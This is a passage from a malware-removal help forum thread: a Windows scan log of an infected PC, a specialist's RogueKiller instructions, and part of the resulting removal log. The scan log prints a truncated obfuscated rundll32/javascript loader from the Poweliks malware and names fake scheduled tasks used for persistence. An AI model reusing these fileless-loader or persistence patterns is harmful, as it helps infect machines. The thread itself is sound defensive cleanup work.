Unreal Development Kit: 2012-07 (HKLM\...\UDK-8d7ec19c-13f9-47d2-a017-ad26215fc52e) (Version:  - Epic Games, Inc.)
Unreal Development Kit: 2014-02 (HKLM\...\UDK-2b78b7b2-e686-42c1-8f7c-2fe04f20f2ab) (Version:  - Epic Games, Inc.)
Unturned (HKLM-x32\...\Steam App 304930) (Version:  - Nelson Sexton)
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
Uplay (HKLM-x32\...\Uplay) (Version: 3.0 - Ubisoft)
Uplink (HKLM-x32\...\Steam App 1510) (Version:  - Introversion Software)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.8-4 - Wacom Technology Corp.)
Warhammer 40,000: Dawn of War - Game of the Year Edition (HKLM-x32\...\Steam App 4570) (Version:  - Relic)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
Why ASUS PC (HKLM-x32\...\{5648F9D9-299E-408C-AC1F-59DC75894A1F}) (Version: 1.00.02 - ASUSTeK Computer Inc.)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 3.6 - Bazis)
Windows Frotz (HKLM-x32\...\WindowsFrotz) (Version:  - )
Windows Live (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Communications Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3503.0728 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Software Development Kit EULA (x32 Version: 8.100.25984 - Microsoft Corporations) Hidden
Windows Software Development Kit for Windows 8.1 (HKLM-x32\...\{25981ccc-475f-4b68-850b-89d3fc287ff1}) (Version: 8.100.26695 - Microsoft Corporation)
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
WorldPainter 1.7.1 (HKLM-x32\...\4144-4862-0472-7103) (Version: 1.7.1 - pepsoft.org)
Wrye Bash (HKLM-x32\...\Wrye Bash) (Version: 3.0.4.4 - Wrye & Wrye Bash Development Team)
XCOM: Enemy Within (HKLM-x32\...\WENPTUVuZW15V2l0aGlu_is1) (Version: 1 - )
Xvid Video Codec (HKLM-x32\...\Xvid Video Codec 1.3.2) (Version: 1.3.3 - Xvid Team)
Zombie Panic Source (HKLM-x32\...\Steam App 17500) (Version:  - Zombie Panic Team)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1557230296-4363482-4078292831-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
20-10-2014 05:46:44 Scheduled Checkpoint
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {05E6FA5F-1C8C-4730-B0C9-BB8640B82410} - \Security Center Update - 467669557 No Task File <==== ATTENTION
Task: {0EF4A154-FEBC-487D-A6B4-912C12223112} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-20] (Google Inc.)
Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task: {23A5D8BE-9196-40EB-BD89-794398B2B073} - System32\Tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask => Rundll32.exe WSClient.dll,RefreshBannedAppsList
Task: {312699F1-CA91-4A62-9438-A029F13EDF91} - System32\Tasks\Security Center Update - 2903558157 => C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe <==== ATTENTION
Task: {3C1DF4E4-F642-455C-B31F-F3CFE7874AB6} - \Security Center Update - 2617606942 No Task File <==== ATTENTION
Task: {4462CF66-3BFB-4F46-8DAA-EB8E5BAD58CB} - System32\Tasks\{AE7C3D4A-D84F-FFE7-69BB-457B9C83DCAC} => C:\Users\RaRWolf\AppData\Roaming\qxigf.dll [2014-10-10] () <==== ATTENTION
Task: {4CCC414B-6206-4F06-B5E5-7584E810198B} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1557230296-4363482-4078292831-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-07-24] (RealNetworks, Inc.)
Task: {52701CBC-326F-4144-8460-9112025E8F42} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-09] (Adobe Systems Incorporated)
Task: {5F57C186-31CD-42F4-ACD6-3D3215E5F1A0} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
Task: {79C28478-DF06-4C6F-9F86-5748287A02E4} - System32\Tasks\Security Center Update - 1765064875 => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe <==== ATTENTION
Task: {7C755F3D-C1EB-4B49-9434-793B6F26B785} - System32\Tasks\Security Center Update - 3029572363 => C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe <==== ATTENTION
Task: {81E2736B-9DF6-4525-845F-19F64C31F0F9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-20] (Google Inc.)
Task: {93039A7B-8D28-42CE-9895-9E7E80712996} - System32\Tasks\Security Center Update - 3324824421 => C:\Users\RaRWolf\AppData\Roaming\Qynygare\soacm.exe <==== ATTENTION
Task: {9EAC1F9E-8030-4FA0-9943-54C3E87D7310} - System32\Tasks\ASUS\ASUS AI Suite II Execute => C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe [2012-03-13] (ASUSTeK Computer Inc.)
Task: {A72208BF-7A49-4FB8-B684-252375F3443A} - System32\Tasks\Microsoft\Windows\WS\License Validation => Rundll32.exe WSClient.dll,WSpTLR licensing
Task: {C4B13F0C-D6C8-4368-A7BA-2C2DFE7ADF7E} - \Security Center Update - 2602486151 No Task File <==== ATTENTION
Task: {C6A88F2D-53D2-4805-9D69-443738A1847C} - System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState => Rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task: {D43C5E37-B7AD-445F-8415-C2C1DD8BF3A1} - System32\Tasks\Security Center Update - 258622643 => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe <==== ATTENTION
Task: {E34A9BB2-F45E-455D-919E-0C128F63BF19} - System32\Tasks\ASUS\ASUS Dr.Net Execute => C:\Program Files (x86)\ASUS\AI Suite II\Dr.Net\AsDrNotify.exe [2012-04-30] (ASUSTeK Computer Inc.)
Task: {E35650CE-6560-457C-9313-A69CE343EEC5} - System32\Tasks\Security Center Update - 3847798286 => C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe <==== ATTENTION
Task: {EBF06DEC-4228-4813-AC0C-62821AE4E330} - System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask => Rundll32.exe Startupscan.dll,SusRunTask
Task: {F02E324B-C8AA-44A7-91FC-0EB0DB7F7590} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1557230296-4363482-4078292831-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-07-24] (RealNetworks, Inc.)
Task: {F5166EA7-D58B-459C-B0E4-B28084AF2299} - System32\Tasks\AdobeAAMUpdater-1.0-Shoobledooble-RaRWolf => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {F5F52209-55E5-40EC-8B34-A8140C33E1E3} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-09-26] (Piriform Ltd)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Security Center Update - 1765064875.job => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 258622643.job => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 2903558157.job => C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3029572363.job => C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3324824421.job => C:\Users\RaRWolf\AppData\Roaming\Qynygare\soacm.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3847798286.job => C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe <==== ATTENTION
 
==================== Loaded Modules (whitelisted) =============
 
2013-12-16 23:52 - 2014-05-19 21:25 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2012-09-14 05:05 - 2012-06-01 05:42 - 00920736 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe
2012-06-18 11:24 - 2012-06-18 11:24 - 00222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_05.dll
2013-01-12 13:00 - 2014-06-30 11:32 - 00076152 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2014-06-27 00:17 - 2014-04-21 18:30 - 01356568 _____ () C:\Program Files\Tablet\Wacom\libxml2.dll
2013-01-28 17:08 - 2013-01-28 17:08 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2013-01-28 17:08 - 2013-01-28 17:08 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-09-14 05:05 - 2014-10-19 21:16 - 00024576 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\PEbiosinterface32.dll
2012-09-14 05:05 - 2010-06-28 22:58 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\ATKEX.dll
2014-10-18 17:10 - 2014-10-09 22:03 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\libglesv2.dll
2014-10-18 17:09 - 2014-10-09 22:03 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\libegl.dll
2014-10-18 17:10 - 2014-10-09 22:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\pdf.dll
2014-10-18 17:09 - 2014-10-09 22:03 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\ffmpegsumo.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 01171456 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00442368 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2013-03-12 17:10 - 2014-10-01 19:16 - 00774656 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2014-05-21 17:41 - 2014-10-21 15:22 - 02226880 _____ () C:\Program Files (x86)\Steam\video.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00403968 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2012-12-26 16:38 - 2014-10-21 15:22 - 00682176 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2012-12-26 16:38 - 2014-09-04 19:29 - 34589376 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2014-08-14 20:06 - 2014-09-04 19:29 - 00837824 _____ () C:\Program Files (x86)\Steam\bin\ffmpegsumo.dll
2014-10-18 17:10 - 2014-10-09 22:04 - 14902600 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Windows\system32\Drivers\fsthvckq.sys:changelist
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "amd_dc_opt"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKCU\...\StartupApproved\Run: => "Skype"
HKCU\...\StartupApproved\Run: => "whatpulse"
HKCU\...\StartupApproved\Run: => "uTorrent"
HKCU\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKCU\...\StartupApproved\Run: => "Desura"
HKCU\...\StartupApproved\Run: => "MurGee.com Auto Clicker"
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-1557230296-4363482-4078292831-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1557230296-4363482-4078292831-1005 - Limited - Enabled)
Guest (S-1-5-21-1557230296-4363482-4078292831-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1557230296-4363482-4078292831-1004 - Limited - Enabled)
RaRWolf (S-1-5-21-1557230296-4363482-4078292831-1002 - Administrator - Enabled) => C:\Users\RaRWolf
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/22/2014 05:08:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0x17b8c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/22/2014 04:42:34 PM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 04:44:04 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 01:03:50 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 00:45:12 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/21/2014 09:12:49 PM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/21/2014 06:33:26 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied.
]
 
Error: (10/21/2014 06:25:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0xda5c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/21/2014 03:03:32 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/20/2014 03:17:47 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
 
System errors:
=============
Error: (10/22/2014 05:18:46 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:45 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:38 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:37 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:32 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:30 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:29 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:27 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:27 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:26 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
 
Microsoft Office Sessions:
=========================
Error: (10/22/2014 05:08:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d017b8c01cfee3c4205f880C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll8d5d6647-5a2f-11e4-bf1c-3085a9a720f7
 
Error: (10/22/2014 04:42:34 PM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 04:44:04 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 01:03:50 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 00:45:12 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/21/2014 09:12:49 PM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/21/2014 06:33:26 PM) (Source: VSS) (EventID: 13) (User: )
Description: {e579ab5f-1cc4-44b4-bed9-de0991ff0623}Coordinator0x80070005, Access is denied.
 
Error: (10/21/2014 06:25:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0da5c01cfed7df5043988C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll33184be0-5971-11e4-bf1c-3085a9a720f7
 
Error: (10/21/2014 03:03:32 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{7722483A-5FB8-4A2E-9422-6DA527A9173F}\recordingmanager.exe
 
Error: (10/20/2014 03:17:47 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{7722483A-5FB8-4A2E-9422-6DA527A9173F}\recordingmanager.exe
 
 
CodeIntegrity Errors:
===================================
  Date: 2013-12-16 21:57:35.239
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-16 21:57:26.378
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-12 20:46:33.532
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-12 20:46:09.428
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-29 11:23:31.388
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-29 11:23:10.452
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-03 09:46:36.351
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-03 09:46:17.007
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-10-21 16:17:24.425
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-10-21 16:17:18.107
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: AMD A8-5500 APU with Radeon™ HD Graphics 
Percentage of memory in use: 86%
Total physical RAM: 8156.38 MB
Available physical RAM: 1133.28 MB
Total Pagefile: 17988.59 MB
Available Pagefile: 7075.63 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:918.55 GB) (Free:49.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: (Tablet_CD) (CDROM) (Total:0.12 GB) (Free:0 GB) CDFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 5F075A5E)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================


#6 Naathim


Posted 22 October 2014 - 05:05 PM

You've got an enormous amount of junk. I haven't seen a machine that infected in a long time...



Scan with RogueKiller

Please download RogueKiller and save the file to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

  • Right-click on the RogueKiller icon and select Run as Administrator to start the tool.
  • Wait patiently until the pre-scan is done. It shouldn't take more than 2-3 minutes.
  • Accept the Terms of use.
  • When the Scan button becomes available, please click it. RogueKiller will start a full scan.
  • Let this process run uninterrupted!
  • When finished, a Report button will become available. Click it. You will be presented with a logfile.

Please include the content of this logfile in your next reply.


Radek Naathim Pawelczyk

Malware Removal Specialist

 



#7 RaRWolf


Posted 23 October 2014 - 04:56 PM

RogueKiller V10.0.3.0 (x64) [Oct 16 2014] by Adlice Software

 
Operating System : Windows 8 (6.2.9200 ) 64 bits version
Started in : Normal mode
User : RaRWolf [Administrator]
Mode : Delete -- Date : 10/23/2014  17:54:53
 
¤¤¤ Processes : 8 ¤¤¤
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermProc]
[Proc.Svchost] svchost.exe -- C:\Windows\system32\svchost.exe[-] -> Killed [TermProc]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
 
¤¤¤ Registry : 42 ¤¤¤
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Okfylaigkiepqul : C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe [x] -> Deleted
